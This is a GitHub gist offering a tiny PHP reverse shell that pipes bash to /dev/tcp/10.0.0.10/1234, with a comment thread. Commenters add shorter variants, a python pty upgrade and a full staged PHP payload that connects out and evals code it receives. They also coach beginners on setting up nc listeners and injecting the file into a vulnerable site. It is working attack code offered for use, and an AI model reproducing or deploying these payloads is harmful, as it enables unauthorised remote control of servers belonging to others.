Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
A tiny PHP/bash reverse shell.
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'");
@ChickenLover
Copy link

ChickenLover commented Aug 13, 2019

python -c 'import pty; pty.spawn("/bin/bash")'

@Serux
Copy link

Serux commented Dec 4, 2019

This shell was writing duplicate input when using a netcat listener.
removing the ampersand (&) solved my problem.

<?php
exec("/bin/bash -c 'bash -i > /dev/tcp/10.0.0.10/1234 0>&1'");

@rshipp
Copy link
Author

rshipp commented Dec 18, 2019

note for anybody coming across this for whatever reason: i have zero tolerance for inappropriate comments on this or any project i control. be kind, or leave.

@nikkolai14
Copy link

nikkolai14 commented May 8, 2020

Is the ip my physical or public ip?

@Serux
Copy link

Serux commented May 8, 2020

If you want to connect to your computer within an intranet, or by VPN, then is the physical IP

(for example if you are 192.168.1.2 and you want 192.168.1.3 to connect to you, you must usa 192.168.1.2)

If you want a machine in the internet to connect with you, it should be the public one, and you may configure port forwarding in your router configuration.
(So you open your local port, 192.168.1.2:1337 , you configure your firewall and router to allow connections from your public address, for example 10.10.10.2:1337 and forward them to your computer, then from another computer on the internet you must use 10.10.10.2:1337)

@nikkolai14
Copy link

nikkolai14 commented May 8, 2020

@Serux

Thanks for the comment If I understand you correctly,

Here is my steps what I did,

  1. I use ngrok to publicly access my local site on the internet
  2. I start the nc in my terminal nc -nvlp 8080
  3. from the php script I use my physical ip then 8080
  4. I inject that remote url from a vuln site.
  5. the nc is now connected to that but the problem is that when I do commands it is on the webserver where I host my remote url

So what I want to achieve is access the vuln site using the reverse shell, I am still a beginner so forgive for that. is that possible?

thank you so much.

@Serux
Copy link

Serux commented May 8, 2020

@nikkolai14

I had to search what was ngrok.

So ngrok makes a localhost port public, like localhost:3000->publicweb.ngrok.io, so at this point you have something like a public subdomain and a public ip that forwards the connections to your localhost.

So when you execute the php script, it runs on the server that hosts the file (localhost) and tries to connect to the desired ip.

If your ip is in the same network as the server, (or your routing table is configured to forward to another network) the server tries to make the connection serverip->yourcomputerip:8080

So the php is being executed in your server, not in another site. The file needs to be executed from the server that you want to conect to, so that the php in that system executes the bash command.

So if that other server (remote url) executes that php( you upload the file and open the url) , you would need a public IP, because that server is on the internet and cannot find your physical ip. In this case you would need a public Ip.

I hope this helps. Ask me if there is something that you dont understand.
I'm writing this on my phone and is a bit difficult to structure the text.

@nikkolai14
Copy link

nikkolai14 commented May 9, 2020

@Serux

Thanks you so much for the reply. I'll try again about the public IP.

@Dom13377
Copy link

Dom13377 commented May 30, 2020

This will work with any operating system on a server. This is a module from Rapid7 that should be used with their handler but you don't have to. Keep in mind this is a staged payload.
/*<?php /**/ error_reporting(0); $ip = 'PUT YOUR IP'; $port = PUT YOUR PORT; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

@Cvar1984
Copy link

Cvar1984 commented Apr 7, 2022

it was bash not a php

@SergioChicoITCL
Copy link

SergioChicoITCL commented Apr 7, 2022

it was bash not a php
@Cvar1984

It uses PHP to call a system command that opens a TCP socket that serves a bash shell to an IP/port.
Then you can connect to that IP/port and get access to this bash shell.
The script from the first post only works in unix-based OS with bash shell executable in the "/bin/" path.

@Cvar1984
Copy link

Cvar1984 commented Apr 7, 2022

it was bash not a php
@Cvar1984

It uses PHP to call a system command that opens a TCP socket that serves a bash shell to an IP/port. Then you can connect to that IP/port and get access to this bash shell. The script from the first post only works in unix-based OS with bash shell executable in the "/bin/" path.

Yea i know it spawn bash using php system call

@Cvar1984
Copy link

Cvar1984 commented Apr 7, 2022

Then this is the tiniest

<?=`"/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'"`?>

@Dom13377
Copy link

Dom13377 commented Apr 7, 2022

it was bash not a php
@Cvar1984

It uses PHP to call a system command that opens a TCP socket that serves a bash shell to an IP/port. Then you can connect to that IP/port and get access to this bash shell. The script from the first post only works in unix-based OS with bash shell executable in the "/bin/" path.

Yea i know it spawn bash using php system call

Yes but the solution from rapid7 works on any operating system because it does not utilize any system calls.

@85406043
Copy link

85406043 commented Jun 5, 2022

eu não sei qual ip usar, alguém me ajuda por gentileza !

@85406043
Copy link

85406043 commented Jun 5, 2022

estou em vpn ! em uma maquina virtual ! eu não sei se uso o da conexão vpn, da maquina virtualizada ou da minha propria maquina !

@SergioChicoITCL
Copy link

SergioChicoITCL commented Jun 6, 2022

estou em vpn ! em uma maquina virtual ! eu não sei se uso o da conexão vpn, da maquina virtualizada ou da minha propria maquina !

@85406043

  1. You have two machines, the attacker and the victim. The victim must have network access to the attacker. (Same network, if you are in a VPN , both machines must be in that network, and those are the important IPs )
  2. You have to open a listening port in your attacking machine, (nc -nvlp 1234)
  3. You have to open a reverse shell, and point it to your attacking machine (VPN IP and open listening port)

And thats all.

@85406043
Copy link

85406043 commented Jun 6, 2022

@SergioChicoITCL muito obrigado campeão ! você é demais !

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment